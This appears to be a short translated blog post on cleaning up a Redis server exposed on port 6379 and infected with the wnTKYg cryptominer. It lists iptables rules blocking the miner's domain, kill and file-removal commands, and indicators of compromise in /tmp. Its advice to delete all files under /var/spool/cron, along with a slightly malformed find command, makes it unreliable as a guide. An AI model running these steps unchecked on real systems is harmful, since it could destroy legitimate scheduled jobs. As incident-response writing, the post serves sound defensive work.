The server linux top command shows that wnTKYg occupies 700% of the CPU:
wnTKYg is a mining program like minerd and AnXqV.
The version of redis 3.2.8 (port 6379) installed on a server was found to be mined today. This time, the CPU resources of different servers have not been consumed to 98%, but have been maintained at 70%. The machine of another server redis3.2.8 (port 6000) on the same IP side is not currently being mined and continues to be monitored.
The temporary workaround is the same as before.
1. Close the access to the mining server : iptables -I INPUT -s www.bdyutiudwj.com -j DROP; iptables -A OUTPUT -d www.bdyutiudwj.com -j DROP
2. Find the minerd program: find / -name wnTKYg *
3. Remove the execute permission: chmod -x wnTKYg
4. Kill the process: pkill wnTKYg
5. Clear timed tasks: delete files under /var/spool/cron directly
6. Clear files: In addition to the two abnormal files under opt that need to be cleared, there are also files under the /tmp folder that need to be cleared, Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)> AnXqV ddg.217 ddg.218 ddg .219 duckduckgo.12.log duckduckgo.17.log duckduckgo.18.log duckduckgo.19.log
Note: Through the reids vulnerability, the default 0.0.0.0:6379 is accessed by the external network and implanted with Trojan programs;
Original address: http://blog.csdn.net/my8611051316/article/details/60571779